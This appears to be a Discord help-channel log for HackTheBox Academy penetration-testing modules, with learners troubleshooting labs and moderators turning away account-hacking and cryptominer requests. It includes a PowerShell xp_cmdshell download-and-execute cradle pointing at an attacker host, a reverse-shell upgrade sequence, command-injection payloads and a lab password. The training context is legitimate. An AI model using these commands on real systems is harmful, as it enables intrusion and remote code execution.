#modules
Did you read the hint?
got it but am not able to transfer the zip file generated from the windows host to the linux host as the linux host does not have internet to download the packages to do it the way i always do it
how do i hack a steam account? it not for evil purposes
in summary can you help with commands to move a file from windows host to linux host
Look at the "File transfers" module
Offtopic
Sure there bud
Read the #rules
i wanted to use upload server but the attacker machine does not have the package to run it and it does not have internet to download it
Actually...
You can do it without the bloodhound
i created two account with the same name and email and i cant log on my second account and there 50$ on my second acc
Hint and powerview would be enough
OK contact steam support
But actually you can make the zipfile with bloodhound-python on linux
aight
yeah it can be done via powerview buuuttt either the commands return nothing or tons of users
I will ask you again, did you read the hint?
There was a hint
why loop do need work with me?
for i in {1..4};do echo hi $i ;done
I run into this issue in PASSWORD ATTACKS
Pass the Ticket (PtT) from Linux with impacket (i upgraded the package but no success there):
[proxychains] Strict chain ... 127.0.0.1:1080 ... ms01:445 ... OK
[-] ('unpack requires a buffer of 4 bytes', "When unpacking field 'length | !L=0 | b''[:4]'")
I changed to the exact version of the example and still get trouble
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:445 ... OK
[-] invalid principal syntax
Can anyone help with AD attacks - Bleeding Edge? I have set up the share to work with the exploits but I get a File Not Found. Anyone able to lend a hand and look at my syntax?
guys i do not get solution for this abnormal question
and when searching for the solution i found this
I tried this method in the "Automating payloads & Delivery with Metasploit" in "Shells & Payloads" and its not working. I searched all across forums and old messages and this was the preferred method. What am I doing wrong?
you should read the chapter with the if conditions again.
i read it but ok i will read it again
sorry i read it again and i did not get it
Think about what exactly needs to be met. Then write your If Statement
very off topic
also @sterile hawk whats the rules on someone having a nazi flag in their pfp
They already left. Just came here to advertise their garbage game.
Removed the message, but yeah I'm going to say if they were still in the server we'd take action on that thanks
funny part is Ive played that game already, Its okay at best.
Hello, i'm new to tech and all this stuff. just wondering, but how does a RCe attack work? what application would you have to need for it to process
RCE is just a generic term to classify stuff. Its not like a specific attack. Its a category
Hi, need help for module "Web Attacks - Skills Assessment".. Is it normal that the button "Submit" doesnt work?
Can you get RCE'D by playing a game?, for example if i was to play CSGO can i get RCE attacked by a random player?
maybe, that depends on if csgo has a vulnerability that enables RCE
RCE is just a possible goal of a vulnerability
well, quick little question i would like to ask you
Is there anyway i can get RCE protection? i want to protect myself from future RCE attacks
You dont protect against RCE directly, its an end goal for some types of attacks. To defend yourself youd defend against various other stuff.
RCE is remote code execution, it just means that the attacker has managed to load code on your system. This can be as complicated as exploiting some vulnerability to it, to having your credentials from somewhere and just logging in as you, to tricking you to run their malware that gives them RCE
oh wow, yeah i actually didnt know this much about RCE
Is this similar to a rat?
a rat would be a type of tool employed to achieve RCE

Ahh okay
rat may be loaded by a different RCE vuln, or possibly by tricking you into running it, etc
Do you recommend malwarebytes?, just in general
I tend to recommend it to my avg customers. But its def not the best or anything.
NVM i got it
but any AV is better than no AV
Do you know the game call of duty black ops?
yes
Yeah well, seems like that game has a lot of vulnerabilities
Could be
simply by opening it you can get hacked apparently
"Hackers can EASILY severely infect your PC with malware, including Remote Administration Tools, which allow complete control over your system by a foreign party. This means the hacker can install malicious programs, execute malicious programs, have access to banking/financial info, have access to any other passwords, open browser windows, or even format your hard drive, wiping all data from the computer in the process."
thats what i saw in the steam reviews of the game
I cant believe this can also happen with call of duty
this channel is mainly for htb academy module discussion
not for discussing maybe cod vulns
ok sorry, just wanted to point that out
do you know what john the ripper is?
yes
What does it do?, i never really understood it. Does it just crack passwords?
Its for cracking hashes yes
Can it be used illegally and legally?
ofc
What's it mainly used for?
Have you ever used it before?
Yes
Did you use it legally?
Ive used it for both. I do not recommend committing crime though. Against server rules. I did it as a dumbass teenager ages ago
oh okay
but again, this chat is for module discussion. If you want to access the generic discussion channel you need to verify your account following the instructions in #welcome
Oh yeah, i forgot to do that
1 more question i would like to ask, Is there any good VPN that i can use that you recommend?
cause this channel is for htb academy. which is HTB training materials and course stuff
I don't use VPNs except for lab stuff
oh alright
id worry about it after completing CPTS
Yeah, this module is really cool
how do people make bitcoin miners and then put it onto someone elses computer?

ok maybe i was a little bit TOO SPECIFIC
Wrong Server
guys
out of topic
i was a bit too specific
and wrong server
No
white hat
server for legal stuff
yea
deploying a malware in remote computers to mine cryptocurrencies
typically when people say bitcoin miner theyre referring to malware versions
This Channel is only about the modules of the HTB Academy
and even if you werent, theres no security benefit in regards to crypto mining
when i say bitcoin mining, i'm not planning on stealing information or doing any of that kind of stuff
then wdym
youre off topic
ok
.
why is the verification system in this server so weird?
literally u said deploying a malware in someone elses computer
Even answering some of your basic questions was pushing the limits of offtopic discussion
because its a large server and given the nature of its content frequently targeted by dumbasses
in a legal USE, i'm not doing anything illegally
simply just injecting malware into someone elses computer but not stealing their information
not all miners are malware
brother that is still incredibly illegal

I know
can we not humor this anymore? lol
People here are either security professionals or aiming to be security professionals
pentesting/red team type stuff
ok fair enough
@fathom spade but this is the last one. verify your account
or were just gunna start pinging for offtopic
ty
I had thought doing cme, kerberos attacks and bh for AD before the exam
I wouldn't
In some ways, they might lead you astray, because the exam was built for the course.
good info, but likely to teach a bunch of stuff you wont see in the exam
The content of the modules from the path is enough for the exam, but additional knowledge is never wrong.
:/ I am still not confident to try the exam
I just want go when I am sure I will pass it
yeah but excess stuff outside of the course wont necessarily improve your odds
itll make you overall better sure
but in pure terms of passing the exam, it wouldnt be efficient
It's easier to jump into the water, than to go inch by inch.
I have been practicing with medium boxes after finishing dante and zephyr
for the foothold
just remember: red teamers have failed this exam because theyve overthinked things
I have a mate doing the exam and he got the foothold in the day 4
k thanks
there is some advantages to being dummy mode haha
I am gonna remember this during exam
For anyone using Kali VMs. I feel like I used to be able to upgrade my reverse shells the standard way. Once a reverse shell is kicked back to me, assuming the box has python, I would do
```
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl-z
stty raw -echo; fg
enter
enter
export TERM=xterm
```
Lately that seems to result in something like this where I cannot get back to my session after typing the fg; enter enter Any help as to what I am doing wrong?
```
CTRL + Z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116
source /etc/skel/.bashrc
```
u missing reset xterm
so after typing echo; fg, I should type reset xterm? is that before or after the enter enter following fg? and Thanks for the help!
Thanks!
I sent it step by step
Thank you!
Anyone ever get this with Zap? I cannot figure out what is causing it. I dont have any additional add-ins installed either.
is there a way to reset a module so it erases the answers?
Been thinking about this
Unfortunately there's none
I wish they would add it. Sometimes I want to re-do a module, but the answer is right there...I mean, yea i can just keep doing it without looking at the answer or until i find it..but its different
Can anyone enlighten me a little as to the differences between gobuster fuzz -w ./vhosts -H "HOST: FUZZ.domain.com" -u "http://10.129.179.60" and ffuf -w ./vhosts -H "HOST: FUZZ.domain.com" -u "http://10.129.179.60"? I'm not sure why I get different results. I imagine it has to do with how the url is handled?
It's just a difference in the tools
Fair enough I guess, I'm just surprised how drastically different the results are.
Specifically, gobuster gives me effectively nothing whereas ffuf is putting out exactly what I'd expect.
Gobuster has a vhost function - you don't have to manually do everything with fuzz.
But it's the same wordlist...
Actually, I can definitely see it has to do with how I'm passing the -u into gobuster - I guess it doesn't handle it the same way - though I'm not sure the correct way for managing that.
This is the vhost method.
"Difference in tools"
Which brings me to my second question, why am I not getting the expected results from gobuster vhost -w ./vhosts -u "http://domain.com" as I am with ffuf.
ffuf is just better
Care to elaborate on that difference? Both tools are designed to use a wordlist to search for differences in the response
Yeah, need to see the actual command and output you're running.
I assume he's just not using gobuster correctly
I dont use either enough to comment on what the differences are
Mind if I send a DM your way? Don't want to spoil modules here or anything
This was my thought too, haha.
Yeah, well for this use case there should be no difference in results.
yeah, that's fine
It could be a difference in syntax
¯\_(ツ)_/¯
Like you can absolutely use gobuster to run through a wordlist for vhosts
a "difference in tools" is that ffuf is probably faster, but the results should be the same because it's the same wordlist and both tools work
I would expect gobuster to be faster.
In vhosts mode it might be
gobuster vhost -u http://10.129.179.60 -w vhosts
should work
Same results (as in, the same as before - not the same as ffuf)
Something weird is happening, do you have proxy setting pointing to burp suite or something?
Nope, just straight up running the cli tools against the given IP. No proxies or anything like that.
@wary plover can you friend me? i have to say something in dms
O_o
I REALLY HAVE TO
it works for me, albeit on a different target
Sure, but the results should be the same because they are being instructed to do the same thing
Happy to share screens in DM if you'd like
im on phone atm so cant, sorry
i dont use discord on my laptop cause its for work :p
Yeah, fair enough, rat is looking through it with me so there's a solid explanation (probably that I'm dumb), haha.
ok but that's not helpful here because we're trying to figure out why gobuster isnt working..?
Mystery solved. I needed --append-domain
(Without seeing my wordlist, it makes sense that this wasn't obvious)
Thanks to everyone who chatted through this with me
tldr: rtfm
@zinc thunder dm
What do you want
Most people aren't gonna blindly dm
And i swear if it's "I need help hacking an account/website"
just see what i dmd you
In b4 MarcieLee gets rickrolled.
No. Fuck off.
Ahh
gg
gg

I did, I'm telling you to fuck off
Be kind please
You have (allegedly) all the info to do it yourself
cant you say it without swearing? are you thinking that swearing makes you cool?? I havent done anything bad to you
Tell him to fuck off in dm 

OH FUCK YOU
FUCK YOU
lol
Considering you're coming in here and blindly asking people
FUCK YOU
well that escalated more than xss -> rce
Is it possible sure.
cant you say it without swearing? are you thinking that swearing makes you cool?? I havent done anything bad to you
I've seen some xss -> rce in electron apps
Still funny
he's got more issues than a HTB box
So curious what that dude was after.
he wanted someone to photoshop his girlfriends face on mia khalifa's body
TLDR reason I said it here was bc he was probably gonna keep trying
Nah even more lame, but it's off-topic for this chat
Really need all channels behind a verification filter.
Allegedly it's being worked on
For a full academy id rather than it being just behind the pay wall
I just installed the latest Parrot OS to do some Wfuzz work. Anyone getting this error about Pycurl
also this is the nicer me
Having trouble uploading images? Check #welcome for how to verify your main account and you'll be able to
The image is fine. The Wfuzz tool is not working right off the hop on the latest
I meant a picture of your error
Copy that
Thanks
This little gem, is my issue. Just started Broken Authentication now going to fix the tool, I guess. Quick google and this an old issue I thought.
Tried to start my pwnbox instance. It basically told me no dice, no available instances. So much for checking that option out.
Ah
Try changing vpn region and launching the pwnbox
Also do sudo apt upgrade lol
I'm getting an "unable to connect" error on the Nessus Skills Assessment when inputting the IP into my browser.
Anyone else have similar issues?
Already did a reset and tried another IP, still no luck
https
Yeah, that's automatically in there in Mozilla.
I tried a new vpn file too
just now
https://[spawnedip]:[nessusport]

That's how you connect to nessus
On this assessment iirc
You have to use the ip:port
Just ip defaults to 443 for https
Which isn't open
I forget what port nessus runs on
Oh I see, I had to go back to the earlier modules to figure it out. So basically the IP they're providing is the IP to Nessus, not the IP of the "target"
Yes
To be fair it was explained earlier in the module, but the "target" part threw me off.
The targets are the ones from the section. Which they have prepopulated scans for you to use
Thanks for the help.
I believe it tells you to authenticate to it above the questions
But easy to miss
hello can someone please help me with this question
i tried nslookup -type=any -query=AXFR inlanefreight.htb
and nslookup -type=any -query=AXFR nc.inlanefreight.htb
this is not the channel for that
What channel
Tell me the channel
we are not able to provide that kind of help
Oh
Ffs
.
.
I tried to do virtualHosting
and i tried dig AXFR ns.inlanefreight.htb @10.129.146.134
and dig AXFR inlanefreight.htb @10.129.146.134
without virtualHosting
but it did not work
my general advice is to watch ippsec's video on Fatty
the section is almost 1 to 1 rip from part of that box
yup
yes, those are completely different application types
but when I say its a rip I mean its literally the same jar file
oh youre still on the hardcoded creds part
nvm
that one just follow exactly step by step
Hi, can't find a general academy channel, but I wanted to ask, I know there is a HTB SOC Analyst cert coming soon. Is it very soon? Or still a while away.
I have issues to rdp to the target machine, what is the problem?
RDP to .... with user "Administrator" and password "AnotherC0mpl3xP4$$"
I tried with xfreerdp and rdesktop
make sure to put single quotes around the password, the $'s will get interpreted differently by the shell if you don't escape them
you win a beer today, thx
I don't drink but o7
=S
highly recommend following along with the section on this, they show you exactly what you need to do
Bob's password is on the section page
Nessus Skills Assessment: What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)
can't find anything in the scan
did the example scan because I didn't want to wait an hour
You're probably overlooking something
I'm not able to double check for you though
Do I need to use anything besides Nessus?
Not that I remember
I kinda have a vague memory of this section because it was so boring
Found it, you just keep clicking and copy/pasting!!!
lol
You can see why I thought it was boring
Like there's not much they can do to improve it anyways
Try that on OSCP, lol
Can't iirc its a banned tool
Yeah, haha, that's why I was jokin about it
I used to hate CLI tools when I started using Linux, now I hate anything with a GUI.
^ navigating imap with CLI 
I still need work with IMAP
You were helping me with it a while back and things were not going well IIRC
I've never used so many free, open-source resources to complete a paid service in my life, hahaha
Eh Google is the best assistant
And literally the links I found were what I used
Word!
PowerPoint
Access!
Slightly off topic for modules but a friend told me to ask on the HTB Starting Point channel my question about Vaccine box but I don't seem to have access to that channel. Am I missing a role or something?
yes
read #welcome
Nessus Skills Assessment: What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?
Tried the one that was rated 10
Did not work
Perfect, thank you!!
Because that's score not the plug in id
Sir its the target
Like if you look at previous Nmap scans you've done
And compare it to the example output
It's easy to figure out

It's the server IP that you put there.
The --proxies proxyip flag can go anywhere in Nmap syntax yeah?
This does not work!
Tried 34460, #34460, and Plugin #34450
and I tried the mentoring service that HTB says they implemented
NO ANSWER!
Try a different service I think you're looking at the wrong one
I think they're frustrated that no answer they've tried is working
I'm looking at the scan provided.
There's multiple scans
:)
2 unauthenticated and 2 authenticated for windows/Linux
Iirc
I haven't actually done the exercises for that section yet because I didn't feel like it, but I feel like people have had issues with and/or complained about it because of a lack of rev experience. Could be wrong though
I like it though
I mean it's also the fact that it's thrown in out of nowhere (it was a recent~ish addition)
Filter by Plugin ID worked
why is it giving me a different result and what dos it mean?
Examples aren't always 1:1 with the practice
Ls
Is it flag.txt
Module: Tcpdump Fundamentals; Question: What TCPDump switch will increase the verbosity of our output? ( Include the - with the proper switch )
I have tried -v -vv -vvv and nothing seems to be working
Any ideas
I tried both tcpdump -v and just plain -v
Try refreshing the page and trying again?
@fathom pendant from some reason just the -v is now working. HA!
Yeah sometimes it's dumb
thank you!
sudo apt upgrade does not fix it.
What software is it?
spoilers, delete
wfuzz via both the web base box and the latest issue both have this error. I am trying to fix my local copy. Any ideas?
likely just copy paste formatting issues
have you verified that this error actually prevents you from continuing
Yes
oh sorry but how can i ask that situation ?
like I said, its likely just an issue of copy pasting. make sure theres no spaces, extra chars, etc
example?
eh
its annoying that its in the course and just a rip. but thats it
which module and section was it again?
thank you mad :C
the question is Find and submit the contents of the TXT record as the answer.
ah what you found wasnt the flag at all
idk what it is you found
¯\_(ツ)_/¯
unless they changed it but didnt remove my answer
i found by doing the command that is mentioned in the module can i send you my command ?
in dm
?
im settled into bed so I wont be able to load up the lab to verify
Read the question again.
you have to assign this value to the variable salt
and what is different the value still equivalent
i am only here for a short time, but you can always write me a dm
The task is to assign the value to the variable salt
If you have done everything correctly, a flag comes out
Hi
nothing changed
Where is all the rest of the code?
this all of the code
No, there is code missing
he order encode var 28 time by base64
and i do it
You need all this code and then you have to put your loop in there.
but why i have base64 command can encode it
The code writes you the flag if you have done everything correctly
Hi! I'm on password attacks, credential hunting in linux module and I cannot find any valid credentials. Any help?
this my code after edit
I have tried hydra in any service with Kira account but nothing found, crackmapexec with smb and nothing
and give me bad decrypto error
I have found a valid credentials for Will user but I can only list smb shares with them
So not very useful
please refrain from posting related spoilers from modules that are above tier 0
My image was a printscreen from the module. It does not contain any hints.
well, to be precise you are posting a content of tier 1 module, where people have invested their time and efforts into developing it
not to be published for free
brother this is the channel for discussing and helping those very modules, that means sometimes including relevant snippets
but how i can sen the code to you?
its unreasonable to enforce it to the extent you currently are
well dude, if people keep going that route snippet by snippet you can build the whole section/modules
thats ridiculous
this channel cannot function like this.
where did this moderation guidelines come from?
ToS
no, where did this moderation guideline come from?
Who do I need to ask about this?
Please, do not continue to argue
No, Im intending to report a complaint about this, and I would like to know where I need to direct it.
Feel free to whomever you want
Really?
Will do then, time to send some DMs and emails.
Up to you
who give you the right to do this rule
Just to note, noone stops you from discussing modules/section, where you can re-phrase or point to specific question
how i can discuss with out send snippet
this is literally the first time Ive ever seen moderatorship take this stance in the channel
Guys, if you are going to using that ridiculous route that eathebuffet is going, there is not point into discussing more
You can always ask for someone to help you via DM, where you won't spoil the exercise publicly
ok
How can I make a complaint?
I already messaged some people. Told will be handled in the morning
MY Hero
Ive noticed he does that often
@autumn pilot so i can not make write ups about module?
ok although but it is not rule do not allow share snippets in the discord
+i see in forums a lot of people share snippets
I run into this issue in PASSWORD ATTACKS
Pass the Ticket (PtT) from Linux with IMPACKET (i upgraded the package but no success there):
[proxychains] Strict chain ... 127.0.0.1:1080 ... ms01:445 ... OK
[-] ('unpack requires a buffer of 4 bytes', "When unpacking field 'length | !L=0 | b''[:4]'")
I changed to the exact version of the example and still get trouble
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:445 ... OK
[-] invalid principal syntax
Can anybody help please?
feel free to report them
really i need to report you
chill out, dont antagonize
his actions made me angry
and he could very well just be doing his job. Thats why I asked who to complain about it to. Its being handled one way or the other, so theres no use in arguing or prodding. Just makes it more likely you get the boot regardless.
ok i will wait and see
In that case, i would suggest only to include owned modules in the HTB academy search bar. Because it is actually an avenue for module content enumeration
hmm you could send requests to the search for every word in the dictionary and then piece the search result previews together 
No screenshots/codeblocks that way.
In the Shells & payloads module, there is an example bind shell that specifies target IP. Why is that even needed? I never used it in previous modules and all my notes only include a port, which would be expected with a bind shell. https://academy.hackthebox.com/module/115/section/1105#:~:text=the TCP session-,No. 1%3A Server - Binding a Bash shell to the TCP session,-Target%40server%3A
that actually sounds like a funny mini project.
if searching for a word pulls up the previews, you could scan for the end of the preview to move the sliding preview window down and collect more information.
big brain time
make sure to gib credit when you write your blogpost that becomes the next big thing on the internet
can you help please, i am still stuck
did you get to login into the mssql database?
one sec i'll check my notes
did you think about command execution?
you should look into that.
yes i did, and i cant get to the desktop because no permissions
did you try another way?
and i tried having a revshell but same
well, this is what I did
did u try priv esc?
do i have to take the priv esc module?
enumerate the user u landed in, there should be a trait that will enable u to priv esc.
no, no need for priv esc module, there is a priv esc technique within the AD module.
check the user u landed in, enumerate the traits, and check the stacking the deck section :)
ok friends, thanks a lot, i will try that
no probs
Hii
guys quick question, did HTB remove the feature where u could extend the life of the exercises machine?
guys whats wrong here, i dont see the problem
Hello I have a question regarding the subscription. I have student subscription with access to all modules until Tier2. When I upgrade to Platinum, will i have my student access to all Tier2 Modules + each month 1000 Cubes? Thank you in advance
no
just 1000 cubes a month
complete all the tier 2 before
thank you for the info
You could try with:
xp_cmdshell 'powershell "IEX(New-Object Net.WebClient).downloadString(\"http://MACHINE-IP:PORT/FILENAME.ps1\")"'
I have taken another way though, so the above it may not work
i managed to do it through smb, but i will try this
can i dm you please?
sure
I have a question that how I can become a HTB ambassador ?
Hello, in Miscellaneous for Active Directory module, the question
Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer.
I found the cleartext password but it's not accepting my answer, can anyone confirm with me if i'm doing the right thing its for asreproasting the ||mmorgan|| user
it's another user than the one mentioned
@fiery berry Thanks, I found it, needed to use ||best64|| rule
This question in the command injection module is driving me insane:
Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
I've tried every possible combination of bypasses already and nothing seems to work.
Use the example from Using $IFS and just replace the IFS with the command.
123.123.123.123%0a${ls -la} this doesn't work. Neither does this: 123.123.123.123%0a${ls,-la}
What does this output mean and how can I fix this? ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r1-.129.190.178 -R22
[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)
Should work. Just replace with 127.0.0.1
Also I dont think that a different ip will change anything except for response time since it's pinging itself
Would change the time to resolve.
Yeah that's what I'm saying
are you sending it in ip=
yes
try without the $
cause of this
cause that's not how you use ${ls,-l}
Yeah that's what I also thought, I was trying it cause wolfiej told me to give it a go.
He probably didn't mean to do it in that way, just a small mistake I guess
Yeah, thanks again
Yeah, I'm on a team meeting, so slightly distracted
Hello everyone, looking for new Pentester friends to make here I am a Cyber Major on my pentest path, I would like to learn and share some of my experiences with some of ya
you can share here as well its good for all of us
Hey guys. I'm on Meterpreter Tunneling & Port Forwarding: Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x) So far when I run the executable that I made with msfvenom it connects back to my multi/handler only for a split second and closes out immediately. msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8080
[*] 10.129.222.140 - Command shell session 1 closed.
[*] 10.129.222.140 - Command shell session 2 closed.
[*] 10.129.222.140 - Command shell session 3 closed.
[*] 10.129.222.140 - Command shell session 4 closed.
and on the ubuntu pivot host I get: ubuntu@WEB01:~$ ./backupjob2
Segmentation fault (core dumped)
The answer is given before you start any sessions
I suggest following this section to a T
Like exactly to a T
ok thank you for the advice
can someone help me on the shells and payloads as I cant work this out for the of me. Its asking for the location of the aspx on the pwn box. and I have entered every possible combination it wants, with file name, different folders that have the same folder and none work
You're connected to the pwnbox yes? Use the locate command or find command
yes i have the files, just none of the inputs are working
It's the laudanum section yeah?
thx again
yep,
Start at /usr/share/
yep, im literally sat in the folder where they are located and copying pwd and its not accepting it
You need to include the /shell.extension
If all else fails, refresh page and put it in again
right theres 2 locations for the file and the hint points you to the wrong one...
Dm me
tells you to look in the /webshells folder where this is the file again
That's close
I have it now
i was in the correct one but didnt add the shell.aspx extension so looked at the hint and it takes you to the wrong folder
thanks
The hint isn't incorrect
It's to start you in the right direction unless it's saying there's a /webshells off of root
And not /path/to/webshells
still confusing how its installed in 2 locations on the machines
oh well, cheers tho
Probably symlinked
You don't need to Crack the key, the intended way is a cache file
Hint: the daemon of the realm shows you the way
It has to connect to Kerberos as the device yeah? Why would it not store those in its own files
Hi guys! If anyone has done Working with IDS/IPS module, can you please DM me?
with which section do you need help
I am struggling with Suricata fundamentals section
feel free to dm
hey, what's up? I'm taking the Password Attacks module and struggling with the question on Credential Hunting in Linux, did anyone here completed it?
Try re-using the query they provide as an example, but change the event_type to something else.
yo
Mistag?
I wanted to ask u a thing
is it worth it doing the powerview module?
the one which costs 1000 cubes
Cost wise, probably not. I think it would be better priced at 500. But as a module I thought it was a decent module building on AD Enumeration.
okay thanks
Hi, for "Documentation & Reporting Practice Lab" do I have to do further enumeration and exploitation to gain access to DC01? and I cant login to WhiteHat app, tried the given credentials. I also need to do further enumeration for this? Thanks...
can I dm u?
I know nothing. Just found the link
oh okay ty
Sorry!
then what happened now?
Attacking Common Services - Easy... I'm so close. Is RDP utilized at all?
Is rdp open?
Indeed it is
Then it's probably utilized
My notes don't reflect utilizing it tho
The first step was smtp
Haha hmm okay thanks. I'm still looking for how to trigger the php shell
Ahh check you
1: used the correct slash direction
2: are in the right web directory:)
Thanks. I'm thinking I missed a directory
Web roots are fun
So why'd you set it to 'PORT'
Lost here too son
It is, in the example
Still working on it, I'll lyk if I can't rig it up
'PORT' can be any one of the 65535 ports
It's based on the attack
There are some default values
Hi
Port is just whatever port the service happens to be running on
Infact it was to say that I need the most powerful cheat of codm I am ready to pay to have it who are interested tell me I pay first
If who is interested let me know
Kindly read the #rules
sorry
Am I doing something wrong with Attacking Thick Clients, can't run monta.ps1 and it throws an error running with -ep bypass in cml, therefore can't create "service.exe" to inspect
You can just fuck all the way off <@&861185840277487616>
chill im just tryna get my shit back
read the rules
i ddint mention hack or anything
Please explain how we would help without hacking
If it's banned then chat with Snapchat support
explaining to me what can i do
Like it's that simple
If they banned it for a legit reason, you're not getting it back
idk maybe someone has a different way
I am someone else btw
Nope support is the way.
they didn't, their ai banned me cus i posted a non psychedelic mushroom
shit sucks
Then chat with their support dude
this is off-topic. take it to their support.
party poopers
¯\_(ツ)_/¯
"It's me, I'm the friend that wants to know"
https://academy.hackthebox.com/module/116/section/1165 I found a user and pass but it wasn't the right answer. On the ftp there is another user and they were correct. I tried to bruteforce their passwd with the pw.list but got nothing. I can't edit passwd on ftp. Am I supposed to find another way to get their password?
Hello, I am stuck in Pass the Ticket (PtT) from Linux, I don't know what is going wrong
at this question Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
Can you help me
Did you try rockyou?
... No, I figured it would be in the file they gave us. thanks I'll try that
What have you tried
thank you for your quick response
i found the path of the cache of linux1 with linikatz and i exported it in KRB5CCNAME
after that i tried to get access with smbclient
i found only one ticket cache for LINUX1$ with Linikatz
I have a general question regarding tunneling with chisel and co. I'm on a box that has a website hosted locally and I expose it via chisel and use proxy chains with Firefox to access the website. Now the website itself includes some bootstrap JavaScript libraries from the open internet. The box doesn't have internet access and when I use proxychains on Firefox neither does Firefox. Now the website is stuck trying to access those js files and I can't really browse it. Is there a solution to this?
Look manually
ok i try to do that
Not related to an academy module, ask in #web or #1024429874246590575
^
I'm at 64 threads, I tried the pws.list file that came with it(I didn't mutate it) now doing rockyou.txt
okay I'll reset, first time I ran nmap there was no FTP and I had to reset
Also running too many ftp threads can have it falsely skip the correct answer
oh didn't know that
didn't get it again, I'll try again without specifying thread amount
Have you tried logging into ftp anonymously first
user error I got the files ty
Hey! I'm doing Linux Privilege Escalation, Containers section and the command it gives to run "lxc exec privesc /bin/bash" just gives "Error: Command not found"
Is there any section that teaches you how to use dockerfiles?
Hello. I'm a bit stuck on this one : https://academy.hackthebox.com/module/19/section/108
I did this scan : sudo nmap ... -p 80 -sV --script vuln
Got result but can't find FLAG
Can someone give me a tip please? Thx
Try a different shell, bash might not be installed
I checked and it is
To clarify, the image they have you import in the section is Alpine Linux, which does not, by default, come with bash
The lxc exec privesc /bin/bash is running bash from within the container, not on your host
Oh, duh, yeah sorry
no worries, everyone has made this mistake at least once when working with that distro
hey anyone has done Attacking DNS at Attacking Common Services?
On Module Pivoting, Tunneling, And Port Forwarding. Section ICMP Tunneling with SOCKS when I try to start the ptunnel on the foothold machine I get the following error. I have a good feeling creating a docker image and compiling ptunnel that way for Ubuntu may fix the problem but this is out of scope for this module and I have never done this before. Is there something I'm missing that's in scope to fix this issue? Also if out of scope how did you solve this issue?
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r1-.129.190.178 -R22
[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)
i
I am stuck on this module for about an age
Is there a command to find the shell inside the container? I've tried a few. I tried "lxc-info -n privesc | grep '^Shell'" and that didn't work.
If you were exploiting this in the wild, you would be uploading your own image, so you would probably know already
I'm not too familiar with lxc specifically outside of the privesc, so I would have to do some labbing to figure that out
OK, thanks anyway. Just weird they put it in the module and didn't give a hint.
The intent was probably to make you not always use /bin/bash and be cognizant of what image you're using
alpine will usually have /bin/sh and /bin/ash
Does anyone know?
use the nmap scan to tell you where to look
I want to say that the nmap script used to print out the contents of the relevant file, but I have no clue why it's not doing it now
Well, the flag fittingly contains "containers uhhh".
thanks for the hint @trail leaf
1 is the highest, right?
/sarcasm
What's your question (that's probably already been asked 1000x)
are these modules in order?
on this section https://academy.hackthebox.com/module/67/section/912 (Windows Server) module: "Windows Priv Esc" there is a problem since it is server 2008 when connecting with rdp, tls error
using xfreerdp we must use /sec:rdp
erratum
Yes
Hello, quick question in password attacks - pass the ticket. It tells us to rdp into the box but the creds didn't work for me. I managed to get round it by using the hash from the pass the hash module. Was this the intended route to get rdp access?
Put password in single quotes

yo having a bit of trouble with the footprinting easy lab, wget all the files for ftp on port 2121 and found the id_rsa.pub, id_rsa and authorized keys and chmod 600 them all but when i ssh -i id_rsa celi@<box ip> and then login with the provided password i get permission denied? any suggestions
That's weird I swear i've used xfreerdp without quotes before
Because that's not the username
That's the password with $$ in it?
im blind i swear
I forget what variable it calls
Thanks for clarifying
Single quotes tell bash to interpret it as a string
Yea you're right cheers
you'd be surprised how many people have asked this question
I tried searching and found someone with the same issue but someone must have pm them the answer
!!
It's definitely a tough module. Although it's not the hardest. heh.
Im doing the network analysis traffic module and one of the files is not showing the questions after extracting the zip file
it only shows the answer sheet
Can somebody hack my old acc that was hacked and i cant have access anymore and give it back to me please i will be grateful a lot
no, wrong server entirely
idk where to ask for help so im doing it here, why doesn't my firefox load anything
Why is it that cypher query to find users who can PsRemote only returns one user but I can see with PowerView that there are other users with that right?
This exercise: https://academy.hackthebox.com/module/143/section/1275
I love this lol
you should practice how can you have pudding if you dont practice?
Thats because it's optional
even if it is not a mandatory exercise, could anyone help me with my problem with /etc/proxychain using impacket and evilwinrm
proxychains evil-winrm -i dc01 -r inlanefreight.htb
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
error: invalid item in proxylist section: cat /etc/proxychains.conf%
socks5 127.0.0.1 1080 is written in proxylist in the file
saying invalid item, so you typod something
:)
lol a hashcat core dev
I sell diabetes and diabetes accessories
lol
thanks for the tool
. My main tool for hash cracking.

it is legal now to send my question?
?
yesterday i saw a moderator did not allow sending questions with snippets
and removed my messages
Ah, just dont worry about it.
so now can i send normally?
Its being handled. And very well could be just that is in fact the new enforcement policy.
hello there, i have a question (wasnt sure where to send this); someone was logged into my gmail account and it shows me the general state (same one im in). would it be possible to get that persons exact address?
and did not work
and give me this error!!!
how i can solve it
what the hell
who removed my question
really a lot of people send snippets and their messages did not get removed
@everyone
Brother you can't @ everyone lol
Literally
If it's removed there's probably a reason
